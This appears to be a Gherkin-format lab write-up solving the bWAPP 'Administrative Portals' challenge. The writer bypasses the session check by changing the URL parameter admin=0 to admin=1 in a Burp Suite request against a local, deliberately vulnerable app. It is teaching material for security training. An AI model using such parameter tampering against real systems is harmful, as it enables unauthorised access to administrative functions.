# language: en

Feature: Administrative Portals
  From system bWAPP
  From the A2 - Broken Auth. & Session Mgmt.
  With Low security level
  Rule:
    REQ.143: https://fluidattacks.com/web/es/rules/143/

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  Given the following
  """
  URL: http://localhost/bWAPP/smgmt_admin_portal.php?admin=0
  Message: Session Mgmt. - Administrative Portals
  Details:
      - This page is locked
      - HINT: Check the URL
  Objective: Bypass the Management Session
  """

Scenario: Bypass Session Management
  Given the inital site
  When the page loads the following shows up:
  """
  # smgmt_admin_portal.php
  <div id="main">
    <h1>Session Mgmt. - Administrative Portals</h1>
    <p><font color="red">This page is locked.</font><p>\
    HINT: check the URL...</p></p>
  </div>
  """
  Then I do as the hint states
  And I look at URL
  Then I see a parameter named admin
  """
  # smgmt_admin_portal.php
  Parameter:   admin=0
  Full URL:   smgmt_admin_portal.php?admin=0
  """
  When I change the value to 1
  Then I bypass the session control by manipulating the url parameter
  """
  # Burp Request parameter modified
  GET /bWAPP/smgmt_admin_portal.php?admin=1 HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  Cache-Control: max-age=0

  # smgmt_admin_portal.html Response
  <div id="main">
    <h1>Session Mgmt. - Administrative Portals</h1>
    <p>Cowabunga...<p><font color="green">You unlocked this page using \
    an URL manipulation.</font></p></p>
  </div>
  """
